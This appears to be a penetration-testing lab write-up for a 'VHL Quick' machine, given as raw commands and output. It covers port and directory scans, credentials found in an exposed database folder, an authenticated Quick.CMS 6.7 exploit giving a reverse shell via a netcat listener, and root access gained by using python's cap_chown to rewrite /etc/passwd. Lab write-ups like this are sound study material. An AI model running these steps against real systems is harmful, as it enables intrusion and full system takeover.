nmap

nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 01:16 EST
Nmap scan report for 10.11.1.20
Host is up (0.055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7f:80:87:eb:84:af:0d:b6:f5:11:fb:d5:d0:6d:f4:6c (RSA)
|   256 24:c5:af:74:66:67:5f:a6:2d:a4:87:0d:0c:cf:60:c9 (ECDSA)
|_  256 33:31:bc:a5:58:bf:aa:90:c0:fe:2d:b0:d7:b1:00:47 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Quick.Cms - fast and simple content management system
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Quick.Cms v6.7
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/10%OT=21%CT=1%CU=36878%PV=Y%DS=2%DC=I%G=Y%TM=67A9
OS:99C9%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=107%TI=Z%II=I%TS=A)SEQ(SP
OS:=FE%GCD=1%ISR=108%TI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5
OS:B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88
OS:%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%C
OS:C=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
 
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE
HOP RTT      ADDRESS
1   55.23 ms 10.11.1.20
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.62 seconds

21

21/tcp open  ftp     vsftpd 3.0.3

80

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Quick.Cms - fast and simple content management system
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Quick.Cms v6.7

directory search

dirsearch -u http://10.11.1.20/
 
[08:32:06] Starting: 
[08:32:08] 403 -  275B  - /.ht_wsr.txt
[08:32:08] 403 -  275B  - /.htaccess.bak1
[08:32:08] 403 -  275B  - /.htaccess.orig
[08:32:08] 403 -  275B  - /.htaccess.save
[08:32:08] 403 -  275B  - /.htaccess.sample
[08:32:08] 403 -  275B  - /.htaccess_extra
[08:32:08] 403 -  275B  - /.htaccess_orig
[08:32:08] 403 -  275B  - /.htaccess_sc
[08:32:08] 403 -  275B  - /.htaccessBAK
[08:32:08] 403 -  275B  - /.htaccessOLD2
[08:32:08] 403 -  275B  - /.htaccessOLD
[08:32:08] 403 -  275B  - /.htm
[08:32:08] 403 -  275B  - /.html
[08:32:08] 403 -  275B  - /.htpasswd_test
[08:32:08] 403 -  275B  - /.httr-oauth
[08:32:08] 403 -  275B  - /.htpasswds
[08:32:09] 403 -  275B  - /.php
[08:32:14] 200 -    1KB - /admin.php
[08:32:24] 301 -  307B  - /core  ->  http://10.11.1.20/core/
[08:32:25] 301 -  311B  - /database  ->  http://10.11.1.20/database/
[08:32:25] 200 -  586B  - /database/
[08:32:27] 200 -   15KB - /favicon.ico
[08:32:28] 301 -  308B  - /files  ->  http://10.11.1.20/files/
[08:32:28] 200 -  688B  - /files/
[08:32:39] 200 -  648B  - /plugins/
[08:32:39] 301 -  310B  - /plugins  ->  http://10.11.1.20/plugins/
[08:32:39] 301 -  318B  - /plugins/tinymce  ->  http://10.11.1.20/plugins/tinymce/
[08:32:39] 200 -  582B  - /plugins/tinymce/
[08:32:42] 403 -  275B  - /server-status/
[08:32:42] 403 -  275B  - /server-status
[08:32:47] 301 -  312B  - /templates  ->  http://10.11.1.20/templates/
[08:32:47] 200 -  460B  - /templates/

/database

http://10.11.1.20/database/

creds

admin@localhost.local:admin123

Quick.CMS 6.7 - Remote Code Execution (Authenticated)

https://www.exploit-db.com/exploits/49494

python3 49494.py http://10.11.1.20/ 'admin@localhost.local' 'admin123' 172.16.1.2 1234

nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.2] from (UNKNOWN) [10.11.1.20] 37794
bash: cannot set terminal process group (829): Inappropriate ioctl for device
bash: no job control in this shell
www-data@quick:/var/www/html$ whoami
whoami
www-data

python3 -c 'import pty; pty.spawn("/bin/bash")'

privilege escalation

www-data@quick:/tmp$ uname -a
uname -a
Linux quick 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
www-data@quick:/tmp$ cat /etc/os-release
cat /etc/os-release
NAME="Ubuntu"
VERSION="20.04.1 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.1 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31

 
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -

╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget
 
╔══════════╣ Installed Compilers
 
╔══════════╣ MySQL version
mysql  Ver 15.1 Distrib 10.3.25-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2

python cap_chown capability

https://gtfobins.github.io/gtfobins/python/#capabilities

Files with capabilities (limited to 50):
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/python3.8 = cap_chown+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

change permissions for /etc/passwd

www-data@quick:/var/www/html$ /usr/bin/python3.8 -c 'import os;os.chown("/etc/passwd",33,33)'

www-data@quick:/tmp$ ls -al /etc/passwd
ls -al /etc/passwd
-rw-r--r-- 1 www-data www-data 2004 Mar 15  2021 /etc/passwd

root:x:0:0:root:/root:/bin/bash

openssl passwd 'newroot'
$1$hL/tGXf4$PkCqeC8GfxudaFNUWNqvt1

newroot:$1$hL/tGXf4$PkCqeC8GfxudaFNUWNqvt1:0:0:root:/root:/bin/bash

add a new root user

www-data@quick:/tmp$ echo 'newroot:$1$hL/tGXf4$PkCqeC8GfxudaFNUWNqvt1:0:0:root:/root:/bin/bash' >> /etc/passwd

www-data@quick:/var/www/html$ su newroot
su newroot
Password: newroot
 
root@quick:/var/www/html# whoami
whoami
root
root@quick:/var/www/html# cat /root/key.txt
cat /root/key.txt
ciskzpric4095x6bytel
root@quick:/var/www/html# date
date
Mon 10 Feb 2025 02:47:14 PM UTC

VHL — Quick

nmap

21

80

directory search

/database

creds

Quick.CMS 6.7 - Remote Code Execution (Authenticated)

privilege escalation

python cap_chown capability